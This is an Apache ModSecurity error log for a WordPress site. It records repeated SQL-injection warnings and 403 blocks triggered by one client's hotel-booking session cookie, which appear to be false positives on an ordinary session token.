[Mon May 11 22:29:24.863090 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8JHo_DFxNSZVmaX3SDgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:25.435314 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8JXo_DFxNSZVmaX3SEAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:25.435608 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8JXo_DFxNSZVmaX3SEAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:26.046519 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8JXo_DFxNSZVmaX3SEAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:26.643849 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8Jno_DFxNSZVmaX3SFwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:26.644144 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8Jno_DFxNSZVmaX3SFwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:27.230587 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Jno_DFxNSZVmaX3SFwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:28.350600 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8KKFW67LJTsgN3jQNAQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:28.350906 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8KKFW67LJTsgN3jQNAQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:28.920225 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8KKFW67LJTsgN3jQNAQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:29.137442 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8KaFW67LJTsgN3jQNAwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:29.137733 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8KaFW67LJTsgN3jQNAwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:29.511934 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8KaFW67LJTsgN3jQNAwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:30.139592 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8KqFW67LJTsgN3jQNBwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:30.139872 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8KqFW67LJTsgN3jQNBwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:30.770202 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8KqFW67LJTsgN3jQNBwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:31.046585 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8K6FW67LJTsgN3jQNCQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:31.046871 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8K6FW67LJTsgN3jQNCQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:31.650721 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8K6FW67LJTsgN3jQNCQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:31.851095 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8K6FW67LJTsgN3jQNCgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:31.851396 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8K6FW67LJTsgN3jQNCgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:32.453904 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8K6FW67LJTsgN3jQNCgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:32.956802 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8LKFW67LJTsgN3jQNDAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:32.957074 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8LKFW67LJTsgN3jQNDAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:33.526005 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8LKFW67LJTsgN3jQNDAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:34.053244 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8LqFW67LJTsgN3jQNDwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:34.053539 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8LqFW67LJTsgN3jQNDwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:34.630775 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8LqFW67LJTsgN3jQNDwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:34.829976 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8LqFW67LJTsgN3jQNEAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:34.830277 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8LqFW67LJTsgN3jQNEAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:35.204994 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8LqFW67LJTsgN3jQNEAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:35.830249 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8L6FW67LJTsgN3jQNEgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:35.830535 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8L6FW67LJTsgN3jQNEgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:36.429481 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8L6FW67LJTsgN3jQNEgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:36.845617 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8MKFW67LJTsgN3jQNEwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:36.846034 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8MKFW67LJTsgN3jQNEwAAABE"], referer: https://rentparadise.fr/wp-login.php
